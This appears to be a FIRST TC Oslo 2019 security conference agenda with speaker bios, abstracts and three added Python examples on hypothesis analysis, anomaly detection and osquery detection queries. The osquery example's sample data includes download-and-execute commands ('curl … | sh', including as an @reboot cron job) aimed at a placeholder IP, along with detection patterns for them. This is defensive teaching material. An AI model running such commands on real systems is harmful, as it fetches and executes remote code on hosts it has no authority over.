This is a working draft agenda. Agenda is subject to change.
Workshops (October 15, 2019)

Time | Session | Speaker
---|---|---
09:00 – 16:00 | Workshop: MISP Training - Threat Intelligence Analyst and Administration | Andras Iklody (CIRCL, LU)
12:00 – 15:00 | Workshop: Cross-Platform Incident Investigation with MITRE ATT&CK Framework & osquery | Milan Shah (Uptycs, US)
FIRST TC Oslo 2019 Day 1 - Security Monitoring (October 16, 2019)

Time | Session | Speaker
---|---|---
09:00 – 09:30 | Registration & Coffee |
09:30 – 09:40 | Introduction |
09:40 – 10:40 |  | Andras Iklody (CIRCL, LU)
10:40 – 10:50 | Break |
10:50 – 11:35 | osquery: A Comprehensive Approach to CSIRT Analytics | Milan Shah (Uptycs, US)
11:35 – 11:45 | Break |
11:45 – 12:15 | BAS5 - A collection of open source security tools | Christian Sundberg (Swedish Civil Contingencies Agency (MSB), SE)
12:15 – 13:15 | Lunch |
13:15 – 14:15 | Attack Patterns for Analytics and Machine Learning Applications | Shane McElligott (Cisco, US)
14:15 – 14:25 | Break |
14:25 – 15:25 | 2 Tales and Their not so Happy Endings | Frans van Ierland (Splunk)
15:25 – 15:35 | Break |
15:35 – 16:20 | Data, Machine Learning and Security | Alan Saied (Visma)
16:20 – 16:30 | Closing Remarks |
FIRST TC Oslo 2019 Day 2 - Incident Response (October 17, 2019)

Time | Session | Speaker
---|---|---
09:00 – 09:30 | Registration & Coffee |
09:30 – 09:40 | Introduction |
09:40 – 10:40 | Stuxnet and Beyond: The Age of Digital Warfare | Kim Zetter (US)
10:40 – 10:50 | Break |
10:50 – 11:35 | Critical Design Errors in Business Critical Systems: One Disclosure, Two Stories | Bjarne Rasmussen (Broadcom); Hans-Petter Fjeld (Basefarm)
11:35 – 11:45 | Break |
11:45 – 12:30 | An APT’s Revenge: How Attackers Respond to Disclosure | Saher Naumaan (BAE Systems)
12:30 – 13:15 | Lunch |
13:15 – 14:00 |  | Jon Røgeberg (mnemonic, NO)
14:00 – 14:10 | Break |
14:10 – 14:40 | Unrealistic Exercises Only Renders You Good at Exercising | Margrete Raaum (KraftCERT, NO)
14:40 – 14:50 | Break |
14:50 – 15:20 | Applying Threat Events to the IRT Process | Ove Nærø, Per Morten Sandstad (mnemonic, NO)
15:20 – 15:25 | Break |
15:25 – 15:55 | Fighting APTs: How TCERT Geared Up to Face Them | Henrik Strøm, Julie Dahl, Mona Elisabeth Østvang (Telenor CERT, NO)
15:55 – 16:10 | Closing Remarks |
Frans van Ierland (Splunk)
Frans started his career in the 80s working on a lot of things related to security. At that time there was no such thing as an Internet of Things; we did not even have the internet, and things were limited to a set of tools and hardware. But we did have threats, as they have always been around. This is why Frans decided to help customers stay in control of cyber threats and security-related issues, building tools and developing frameworks to get things done. Frans now serves customers at Splunk as a Security Specialist, working with the largest customers, agencies and people who just love to catch the bad guys.
"A long, long time ago there lived an evil thief in a dark underworld…" This is how it normally starts. But in fact it is not a long time ago. It's now, as the future is now! Those guys are still around and often more sophisticated than two weeks ago. Yep, this is how fast things evolve. By the way, they are well organized and play the game in a very professional way. You all know that the game is changing each day and we hardly get a chance to educate ourselves against what's coming. Therefore we take the opportunity to tell you our tales of the good, the bad and the really ugly attacks, and how we were helped by our assistant AS, a.k.a. Analytic Stories.
Key takeaways:
October 16, 2019 14:25-15:25
Saher Naumaan (BAE Systems)
Saher Naumaan is a Threat Intelligence Analyst at BAE Systems Applied Intelligence. She currently researches state-sponsored cyber espionage with a focus on threat groups and activity in the Middle East. Saher specialises in analysis covering the intersection of geopolitics and cyber operations, and regularly speaks at public and private conferences around the world, including SAS, Virus Bulletin, and Bsides. Prior to working at Applied Intelligence, Saher graduated from King’s College London with a Master’s in Intelligence and Security, where she received the Barrie Paskins Award for Best MA dissertation in War Studies.
Government and industry have invested significant effort in understanding the threat landscape in order to defend their interests in cyberspace, but the issue of how defensive action can influence attacker behaviour is poorly understood. This presentation seeks to explore the question: how do attackers respond to investigation into their operations? We will review the ‘spectrum’ of response options and changes that attackers have made to their operations following incident response cases and public reporting (and attribution) of specific groups. Responses range from defensive (‘go quiet’) to aggressive (threats or targeting of researchers), and include a multitude of change-ups in tactics, techniques, and procedures in between. This analysis will draw on evidence from numerous examples both from our investigations and cases from open sources to cover high priority threat groups faced by the public and private sectors as well as unintended consequences of disclosure and thoughts from a defender perspective.
October 17, 2019 11:45-12:30
Ove Nærø (mnemonic, NO), Per Morten Sandstad (mnemonic, NO)
Ove Nærø has worked in mnemonic's Threat Intelligence group as a tactical analyst since June 2018. He has more than 15 years' experience dealing with incident response across multiple business verticals, such as finance and health care, and has worked with threat intelligence at the strategic, tactical and operational levels.
Per Morten Sandstad works in mnemonic's Threat Intelligence group as an analyst. He has more than ten years' experience with incident response and threat intelligence. Before joining mnemonic in September 2018 he was the first hire into establishing FinansCERT Norge (now Nordic Financial CERT), where he headed up the threat intelligence work and focused on supporting the financial industry and their incident response teams.
This talk will show how to use threat events when responding to security incidents. In this context, threat events are the different courses of action a threat actor may pursue to reach their desired end state; they describe the various ways threat actors can negatively affect a victim organisation. Each threat actor may initiate several threat events, some unique to that actor and some resembling those of other actors. Ove and Per Morten will go into how these threat events, combined with structured analytic techniques such as Analysis of Competing Hypotheses (ACH), can answer critical questions in the IRT process and help prioritise tasks.
October 17, 2019 14:50-15:20
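The abstract above names Analysis of Competing Hypotheses as the way to decide which threat event an incident most likely represents. The following is an added example, not code from the talk or from mnemonic, showing the mechanics of ACH on a small evidence matrix: each hypothesis (a candidate threat event) is scored by the weighted evidence that is inconsistent with it, evidence that rates the same against every hypothesis is flagged as non-diagnostic, and a sensitivity pass reports which evidence items the ranking actually hinges on. The hypotheses, evidence items, ratings and weights are all constructed for illustration; in a real case they are analyst judgements.

```python
"""Analysis of Competing Hypotheses (ACH) over incident evidence.

Added example, not from the talk. ACH ranks hypotheses by how much evidence
REFUTES them (weighted inconsistency), not by how much supports them, because
consistent evidence usually fits several hypotheses at once. All data below
is constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

CONSISTENT, INCONSISTENT, NEUTRAL = "C", "I", "N"


@dataclass
class Evidence:
    id: str
    description: str
    ratings: Dict[str, str]   # hypothesis id -> C / I / N (analyst judgement)
    weight: float = 1.0       # credibility x relevance; 1.0 = ordinary


# Hypotheses = candidate threat events (hypothetical labels).
HYPOTHESES = {
    "H1": "opportunistic commodity malware infection",
    "H2": "targeted intrusion aiming at data theft",
    "H3": "insider misuse of legitimate credentials",
}

# Constructed evidence matrix with illustrative ratings.
EVIDENCE = [
    Evidence("E1", "macro-laden phishing mail sent to ~40 staff",
             {"H1": "C", "H2": "I", "H3": "I"}),
    Evidence("E2", "lateral movement to file server with valid admin credentials",
             {"H1": "N", "H2": "C", "H3": "C"}),
    Evidence("E3", "documents staged into a password-protected archive at 02:00",
             {"H1": "I", "H2": "C", "H3": "C"}, weight=0.5),
    Evidence("E4", "custom loader unknown to AV and public sandboxes (forensics)",
             {"H1": "I", "H2": "C", "H3": "I"}, weight=2.0),
    Evidence("E5", "command-and-control traffic uses HTTPS on port 443",
             {"H1": "C", "H2": "C", "H3": "C"}),
]


def inconsistency_scores(hypotheses: Dict[str, str],
                         evidence: List[Evidence]) -> Dict[str, float]:
    """Weighted sum of the evidence rated inconsistent with each hypothesis."""
    scores = {h: 0.0 for h in hypotheses}
    for e in evidence:
        for h in hypotheses:
            if e.ratings.get(h, NEUTRAL) == INCONSISTENT:
                scores[h] += e.weight
    return scores


def rank_hypotheses(hypotheses: Dict[str, str],
                    evidence: List[Evidence]) -> List[Tuple[str, float]]:
    """Lowest inconsistency first; ties broken by hypothesis id for determinism."""
    scores = inconsistency_scores(hypotheses, evidence)
    return sorted(scores.items(), key=lambda kv: (kv[1], kv[0]))


def non_diagnostic(hypotheses: Dict[str, str],
                   evidence: List[Evidence]) -> List[str]:
    """Evidence rated identically against every hypothesis cannot tell them
    apart, however interesting it looks; it should be dropped from the matrix."""
    return [e.id for e in evidence
            if len({e.ratings.get(h, NEUTRAL) for h in hypotheses}) == 1]


def sensitivity(hypotheses: Dict[str, str],
                evidence: List[Evidence]) -> List[str]:
    """Evidence items whose removal changes the leading hypothesis: these are
    the ones to re-verify (or the gaps to close) before acting on the ranking."""
    leader = rank_hypotheses(hypotheses, evidence)[0][0]
    pivots = []
    for e in evidence:
        rest = [x for x in evidence if x.id != e.id]
        if rank_hypotheses(hypotheses, rest)[0][0] != leader:
            pivots.append(e.id)
    return pivots


if __name__ == "__main__":
    for h, s in rank_hypotheses(HYPOTHESES, EVIDENCE):
        print(f"{h} inconsistency={s:.1f}  {HYPOTHESES[h]}")
    print("non-diagnostic evidence:", non_diagnostic(HYPOTHESES, EVIDENCE))
    print("ranking hinges on:", sensitivity(HYPOTHESES, EVIDENCE))
```

With the constructed matrix, H2 leads because only one ordinary-weight item refutes it, but the sensitivity pass shows the whole ranking rests on E4 (the forensic finding about the loader); removing it makes the commodity-malware hypothesis lead instead, which is exactly the kind of dependency an IRT wants to know before it prioritises containment work.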
Shane McElligott (Cisco, US)
Shane has nearly 20 years of experience, with the majority of it being at IBM and Cisco Systems. He is a seasoned Data Scientist and AI Developer with a background in network and cloud security. He has experience consulting for businesses of diverse scope and scale; governments and NGOs; health care, academia and scientific research initiatives. Shane is a holder of several patents in the AI, robotics, cloud and security domains. A dual-citizen of the Republic of Ireland and the US, Shane is passionate about creating data privacy-enhancement technology as well as building and advocating for foundational security and ethics solutions within the data science and AI domains.
Privacy Attacks and Differential Privacy, Machine Learning Attacks and Defenses, Challenges, Exploring CVSS Interpretations for ML Vulnerabilities, Where to Learn More
October 16, 2019 13:15-14:15
Christian Sundberg (Swedish Civil Contingencies Agency (MSB), SE)
Christian Sundberg works in the Critical Information Infrastructure Protection Section at the Swedish Civil Contingencies Agency (MSB). The section provides advice, technical training and other support aimed at reducing the vulnerabilities of cyber-physical systems across society. He has 15 years of experience with IT and OT in the energy sector, where he worked with SCADA/ICS systems as an automation engineer and spent several years in information system management.
BAS5 is a collection of software tools that helps operators of industrial information and control systems improve their information and cyber security. Its purpose is to raise the security level of operators who, for financial or other reasons, are not in a position to acquire technical protection mechanisms. Through BAS5, MSB gives operators access to basic protection in their ICS and SCADA environments, and tools to get started with security-enhancing measures quickly and easily.
October 16, 2019 11:45-12:15
Bjarne Rasmussen (Broadcom), Hans-Petter Fjeld (Basefarm)
Bjarne Rasmussen is currently CTO, EMEA Enterprise in Broadcom and has 20 years of experience from different leader roles in CA Technologies.
Hans-Petter is a senior Information Security Engineer at Basefarm, the leading Norwegian managed hosting provider. He operates the security solutions Basefarm provides, handles incidents, and does forensics, vulnerability assessments and pentests, and is an all-round blue-team member.
This is the story of CVE-2018-13819, CVE-2018-13820 and CVE-2018-13821, the lessons learned during vulnerability disclosure, and the path to mitigating a central design error. Mistakes were made, and acting ethically turned out to be a moving target. Broadcom joins the presentation to give its perspective as the receiving end of the disclosure.
October 17, 2019 10:50-11:35
Alan Saied (Visma)
Alan is passionate about Security in the context of Machine Learning and Artificial Intelligence. He spends most of his time learning about different data behavioral cases where Machine Learning can be applied. Alan holds a PhD in Computer Security from King's College in London.
Data is the fundamental backbone of any business, and the ability to mathematically "use data to protect data" is the core focus of this talk. We explain how machine learning algorithms and data analytics can be used to identify abnormal patterns within complex environments, and then examine the complications: false positives, detection accuracy and the validity of what is detected.
October 16, 2019 15:35-16:20
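The abstract above promises both the detection of abnormal patterns and the false-positive trade-off that comes with it. The following is an added example, not code from the talk or from Visma, that makes that trade-off concrete on constructed data: per-account daily download counts are scored with a robust (median/MAD) z-score against each account's own baseline week, then two thresholds and a naive global limit are evaluated against hindsight labels. The accounts, counts, labels, the seven-day baseline window and the thresholds are all assumptions made for the illustration.

```python
"""Robust per-entity anomaly scoring with an explicit false-positive /
missed-detection trade-off. Added example; all data is constructed."""
from statistics import median
from typing import Dict, List, Set, Tuple

# Constructed: 14 days of "documents downloaded per day" per account.
# Days 1-7 form the per-account baseline, days 8-14 are scored.
COUNTS: Dict[str, List[int]] = {
    "alice": [10, 12, 11, 13, 10, 12, 11,   12, 11, 13, 10, 180, 12, 11],  # one mass download
    "bob":   [40, 60, 45, 70, 50, 55, 65,   62, 48, 75, 52, 58, 90, 47],   # legitimately busy role
    "carol": [20, 21, 19, 20, 22, 20, 21,   21, 20, 26, 19, 21, 20, 22],   # benign quarter-end bump
    "dave":  [8, 10, 9, 11, 8, 10, 9,       10, 9, 15, 16, 18, 19, 21],    # low-and-slow exfil
}
BASELINE_DAYS = 7

# Ground truth (account, day) known only in hindsight; used to grade the detector.
TRUE_ANOMALIES: Set[Tuple[str, int]] = {("alice", 12)} | {("dave", d) for d in range(10, 15)}


def robust_z(x: float, baseline: List[int]) -> float:
    """Median/MAD z-score: one outlier in the baseline barely moves it, unlike
    mean/stddev. 0.6745 rescales MAD to a normal sigma. A MAD of 0 (perfectly
    constant baseline) would make every deviation infinite, so floor it at
    one count; that floor is an assumption of this example."""
    med = median(baseline)
    mad = max(median([abs(v - med) for v in baseline]), 1.0)
    return 0.6745 * (x - med) / mad


def flag_robust(counts: Dict[str, List[int]], threshold: float) -> Set[Tuple[str, int]]:
    """One-sided: only unusually HIGH counts are flagged (exfil direction)."""
    flagged = set()
    for account, series in counts.items():
        base = series[:BASELINE_DAYS]
        for day, x in enumerate(series[BASELINE_DAYS:], start=BASELINE_DAYS + 1):
            if robust_z(x, base) > threshold:
                flagged.add((account, day))
    return flagged


def flag_static(counts: Dict[str, List[int]], limit: int) -> Set[Tuple[str, int]]:
    """The naive rule a per-entity baseline replaces: one global limit."""
    return {(a, day) for a, s in counts.items()
            for day, x in enumerate(s[BASELINE_DAYS:], start=BASELINE_DAYS + 1)
            if x > limit}


def evaluate(flagged: Set[Tuple[str, int]], truth: Set[Tuple[str, int]]) -> Dict[str, float]:
    tp, fp, fn = len(flagged & truth), len(flagged - truth), len(truth - flagged)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return {"tp": tp, "fp": fp, "fn": fn,
            "precision": round(precision, 2), "recall": round(recall, 2)}


if __name__ == "__main__":
    print("static  >50 :", evaluate(flag_static(COUNTS, 50), TRUE_ANOMALIES))
    print("robust z>3.0:", evaluate(flag_robust(COUNTS, 3.0), TRUE_ANOMALIES))
    print("robust z>6.0:", evaluate(flag_robust(COUNTS, 6.0), TRUE_ANOMALIES))
```

The global limit fires on every busy day of the legitimately active account and misses the slow exfiltration entirely. The per-account score at z > 3 catches all six true anomalies but also raises carol's benign bump as a false positive; raising the threshold to 6 removes that false positive at the cost of missing the first two days of dave's ramp-up. Which point on that curve is acceptable is an operational decision, not a property of the algorithm, which is the complication the abstract refers to.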
Henrik Strøm (Telenor CERT, NO), Julie Dahl (Telenor CERT, NO), Mona Elisabeth Østvang (Telenor CERT, NO)
Henrik Strøm has over 25 years of experience in the cyber security field. In the early 90s, when anti-virus was a bleeding-edge technology, he spent his time at the Norwegian University of Science and Technology (NTNU) developing his own award-winning anti-virus software. He then moved to Oslo and worked for Telia and Norsk Hydro, and finally Telenor, where he was involved in the emergence of the Internet and "Cyberspace" in Norway. Henrik has held various key security positions in Telenor for over a decade and now heads the newly re-focused Telenor CERT. His team is currently establishing global CERT and SOC operations for Telenor ASA, which owns nine telecommunications companies globally.
Julie works with incident response in TCERT and has several years of experience working with security in Telenor. She has a background as a consultant specializing in both big data and security, and has been part of a larger project working to establish better capability for security monitoring in Telenor’s networks and systems for three years. She has a master’s degree in computer science from NTNU.
Mona Elisabeth Østvang works as an incident manager in TCERT. Before joining TCERT this year she worked as a consultant at mnemonic, where for the past six years she led investigations and handled a number of major events, including advanced and targeted attacks against Norwegian and foreign targets. She holds a master of technology from the Norwegian University of Science and Technology (NTNU) from 2004.
TCERT was established as a department in Telenor Norway security in 2015. The given mandate was to improve Telenor Norway's detection capabilities, as well as responding to nation state actors targeting our networks. A couple of years in, the mandate was expanded to also include Telenor Group Business Units globally. In this presentation we will share how we have set up our organization, some of the tools we are using, and some lessons learned along the way, supported by real life examples.
October 17, 2019 15:25-15:55
Jon Røgeberg (mnemonic, NO)
Jon Røgeberg works as the manager of mnemonic's Threat Intelligence group. He is also the Operational Manager of the virtual mnemonic IRT and responsible for mnemonic's forensics services. He has more than 10 years' experience with incident response, dealing with incidents ranging from virus outbreaks and opportunistic crime to targeted crime and advanced targeted attacks.
This talk will provide advice for maintaining operational security (op-sec) while investigating incidents and performing threat intelligence. Jon will show examples of what to take into consideration, exemplified by op-sec failures when ignoring these precautions. To spice it up, he will show how the adversaries from time to time mess up and fail miserably in their op-sec.
October 17, 2019 13:15-14:00
Milan Shah (Uptycs, US)
Milan Shah is a serial entrepreneur with a track record of building and leading cutting-edge cybersecurity technology companies. Prior to co-founding Uptycs, Milan was SVP of Products and Engineering at Core Security, where he formulated a vision for a new class of automated pen testing solutions. Milan has also served as VP of Engineering at CA Technologies and at IMlogic, which was acquired by Symantec. The first part of his career was spent as a member of the early Windows NT development team, and he was a key architect of Microsoft Exchange. Milan holds a Masters in EECS from MIT and a Bachelors in EECS from the University of Illinois, Urbana.
Speed to detection and the ability to provide a comprehensive view of breached systems are the bread and butter of modern CSIRTs. However, access to a reliable, comprehensive and consolidated view of system data is often a frustrating barrier to reducing dwell time and activating remediation and communication plans.
osquery, an open source universal endpoint agent, is changing the game for CSIRTs, exposing hundreds of system attributes across operating systems (including macOS and Linux), containers and cloud workloads. Combining osquery with a purpose-built analytics backend for storage further enhances its value for incident investigation: it becomes possible to look back historically and understand not just the event but its context (user id, machine, time and activity).
Join this session to explore how osquery is offering a modern and comprehensive approach to CSIRT analytics. We’ll explore specific case studies/production use cases to highlight how osquery’s unique combination of context and event data helps speed up incident investigation practices.
Attendees of this session will gain an understanding of:
October 16, 2019 10:50-11:35
Kim Zetter (US)
Kim Zetter is an award-winning journalist and author who has been covering cybersecurity and national security for two decades. She wrote for WIRED for a decade and more recently for the New York Times Magazine, the Washington Post, Politico, Motherboard, and other publications. She has four times been voted one of the top ten journalists in the U.S. by her peers and industry professionals and has broken numerous stories over the years about NSA surveillance, WikiLeaks and Chelsea Manning, election security, and the hacker underground. She was among the first journalists to cover Stuxnet after its discovery and published a widely acclaimed book on the topic, Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon.
It has been nearly a decade since Stuxnet was discovered in June 2010, the landmark digital weapon that marked the age of cyber warfare. But the code's legacy lives on, with its means and methods reproduced in other nation-state and criminal attacks launched since then. Recently, one of the long-enduring mysteries of Stuxnet was solved, revealing for the first time how the U.S. and Israel got the destructive code onto air-gapped and heavily guarded machines in the Iranian plant at Natanz. Kim Zetter, long-time journalist covering cybersecurity and national security and the author of the most comprehensive book about Stuxnet, Countdown to Zero Day, will tell the story of the code: the planning, execution and discovery, and the details of the attack that made Stuxnet so unique and sophisticated. She will also discuss the implications and repercussions of the assault and the industrial attacks that have followed since Stuxnet opened the door to digital destruction.
October 17, 2019 09:40-10:40
Andras Iklody (CIRCL, LU)
Andras Iklody is a software developer working for CIRCL and has been the main developer of the MISP core since the beginning of 2013. He is a firm believer that there are no problems that cannot be tackled by building the right tool. He handles overall development governance in the MISP core project, especially ensuring that external contributions are in line with the overall objectives of the MISP core functionality.
As the CSIRT community matures, the need to extract more value and context from our data becomes ever more vital. MISP has been gradually expanded to reflect these needs, incorporating features that ease indicator life-cycle management, the contextualisation and management of threat intelligence, collaboration, and the filtered feeding of collected data to our various protective tools. This talk aims to highlight some of the techniques we use via the platform.
October 16, 2019 09:40-10:40
Margrete Raaum (KraftCERT, NO)
Margrete Raaum is CEO of KraftCERT, the Norwegian CERT for the energy, water & wastewater and industrial control system industries. She has a background in IC design, computer networking and information security. She has worked with information security since 1998: for the ISP community, in academia, at the Norwegian Security Authority, NorCERT and the grid and transmission system operator. She was on the board of directors of FIRST (the Forum of Incident Response and Security Teams) for 8 years, serving as chair for 2 of them.
While the management play decision games, the techies are bored. And while the techies solve the puzzles, billions in lost management hours are spent waiting. What to do?
October 17, 2019 14:10-14:40
Milan Shah (Uptycs, US)
Milan Shah is a serial entrepreneur with a track record of building and leading cutting-edge cybersecurity technology companies. Prior to co-founding Uptycs, Milan was SVP of Products and Engineering at Core Security, where he formulated a vision for a new class of automated pen testing solutions. Milan has also served as VP of Engineering at CA Technologies and at IMlogic, which was acquired by Symantec. The first part of his career was spent as a member of the early Windows NT development team, and he was a key architect of Microsoft Exchange. Milan holds a Masters in EECS from MIT and a Bachelors in EECS from the University of Illinois, Urbana.
There is a disconnect between best-practice frameworks and real-life nitty-gritty. While many frameworks broadly cover the overarching principles a robust security program should encompass, and why those principles matter, MITRE ATT&CK does an impressive job of taking it a step further and connecting the dots: it details specifically what kind of attacker behaviour a defender should anticipate, and how an attacker works to thwart those vaunted best practices.
Using osquery, an open-source universal endpoint agent that makes our macOS, Linux, Docker and Windows environments queryable with SQL, we can begin to harden our defences by writing and deploying queries that identify the known behaviours catalogued under the twelve tactics (attack technique categories) of the MITRE ATT&CK matrix.
Security and incident response managers and engineers should attend this hands-on workshop to:
October 15, 2019 12:00-15:00
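Both osquery sessions on this page (the talk on CSIRT analytics and the workshop above) come down to the same mechanic: an osquery table is a SQL view over live host state, and a detection is a query over it mapped to an ATT&CK technique. The following is an added example, not code from the workshop, from Uptycs or from the osquery project. Because osquery's tables are served by an embedded SQLite engine, the three queries below are written exactly as they would go into a query pack, and are run here against an in-memory SQLite database holding a subset of the real `processes` and `crontab` column names, filled with constructed rows so the whole thing runs offline. The technique IDs use current ATT&CK numbering (sub-techniques postdate the 2019 workshop); the process and cron entries, the IP address and the file paths are invented.

```python
"""osquery-style detection queries mapped to ATT&CK techniques, executed
against an in-memory SQLite copy of two osquery tables. Added example, not
from the workshop or the osquery project; sample rows are constructed."""
import sqlite3
from typing import Dict, List, Tuple

# Subset of the real osquery column names for these two tables.
SCHEMA = """
CREATE TABLE processes (pid INTEGER, name TEXT, path TEXT, cmdline TEXT,
                        parent INTEGER, uid INTEGER, on_disk INTEGER);
CREATE TABLE crontab (event TEXT, minute TEXT, hour TEXT, day_of_month TEXT,
                      month TEXT, day_of_week TEXT, command TEXT, path TEXT);
"""

# Constructed sample rows: a normal baseline plus three suspicious entries.
PROCESSES = [
    (1, "systemd", "/usr/lib/systemd/systemd", "/sbin/init", 0, 0, 1),
    (812, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D", 1, 0, 1),
    (2201, "soffice.bin", "/opt/libreoffice/program/soffice.bin",
     "soffice.bin invoice.docm", 1, 1000, 1),
    (2250, "sh", "/bin/sh", "sh -c curl http://203.0.113.7/x | sh",
     2201, 1000, 1),                                            # office app spawned a shell
    (3001, "kworker", "/tmp/.x/kworker", "/tmp/.x/kworker", 1, 1000, 0),  # binary deleted from disk
    (3120, "bash", "/bin/bash", "-bash", 812, 1000, 1),        # ordinary ssh login shell
]
CRONTAB = [
    ("", "0", "3", "*", "*", "*", "/usr/bin/certbot renew -q", "/etc/cron.d/certbot"),
    ("@reboot", "", "", "", "", "", "curl -s http://203.0.113.7/p | sh",
     "/var/spool/cron/crontabs/www-data"),
]

# Query pack: osquery-compatible SQL plus the ATT&CK technique each query covers.
QUERY_PACK: Dict[str, Dict[str, str]] = {
    "office_spawned_shell": {
        "attack": "T1059.004 Command and Scripting Interpreter: Unix Shell",
        # Self-join on processes: child's parent pid -> parent row.
        "query": """
            SELECT c.pid, c.name, c.cmdline, p.name AS parent_name
            FROM processes c JOIN processes p ON c.parent = p.pid
            WHERE p.name IN ('soffice.bin', 'libreoffice', 'acroread')
              AND c.name IN ('sh', 'bash', 'dash', 'zsh', 'python', 'perl')""",
    },
    "process_binary_deleted": {
        "attack": "T1070 Indicator Removal",
        # on_disk = 0 means the executable backing a running process is gone.
        "query": "SELECT pid, name, path, cmdline FROM processes WHERE on_disk = 0",
    },
    "cron_download_and_execute": {
        "attack": "T1053.003 Scheduled Task/Job: Cron",
        "query": """
            SELECT command, path FROM crontab
            WHERE command LIKE '%curl%' OR command LIKE '%wget%'
               OR command LIKE '%/tmp/%' OR command LIKE '%| sh%'""",
    },
}


def build_db() -> sqlite3.Connection:
    """Stand-in for the live osquery tables, so the pack can run offline."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO processes VALUES (?,?,?,?,?,?,?)", PROCESSES)
    db.executemany("INSERT INTO crontab VALUES (?,?,?,?,?,?,?,?)", CRONTAB)
    return db


def run_pack(db: sqlite3.Connection, pack: Dict[str, Dict[str, str]]) -> Dict[str, List[Tuple]]:
    """Return {query_name: rows}; a backend would key these by technique, host and time."""
    return {name: db.execute(q["query"]).fetchall() for name, q in pack.items()}


if __name__ == "__main__":
    hits = run_pack(build_db(), QUERY_PACK)
    for name, rows in hits.items():
        print(f"{name} [{QUERY_PACK[name]['attack']}]: {len(rows)} hit(s)")
        for row in rows:
            print("   ", row)
```

Each query fires on exactly one of the planted rows and stays silent on the baseline: the ssh login shell is not flagged because its parent is sshd, and the certbot cron entry does not match the download-and-execute patterns. The same SQL, scheduled in a real query pack, would give the historical look-back the talk abstract describes once the results are shipped to a backend with host and timestamp attached.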
Andras Iklody (CIRCL, LU)
Andras Iklody is a software developer working for CIRCL and has been the main developer of the MISP core since the beginning of 2013. He is a firm believer that there are no problems that cannot be tackled by building the right tool. He handles overall development governance in the MISP core project, especially ensuring that external contributions are in line with the overall objectives of the MISP core functionality.
In a continuous effort since 2016, CIRCL regularly gives training sessions on MISP. The purpose is to reach security analysts who use MISP as a threat intelligence platform as well as users who use it as an information sharing platform. It is also an opportunity for users to meet the developers and discuss potential improvements and use cases for MISP as a threat intelligence platform.
The MISP training will demonstrate how the platform functions, explain how to share, comment on and contribute data, and describe future developments. This part of the training focuses on the analyst aspect along with the management of your own MISP instance, especially how to connect to other MISP communities.
October 15, 2019 09:00-16:00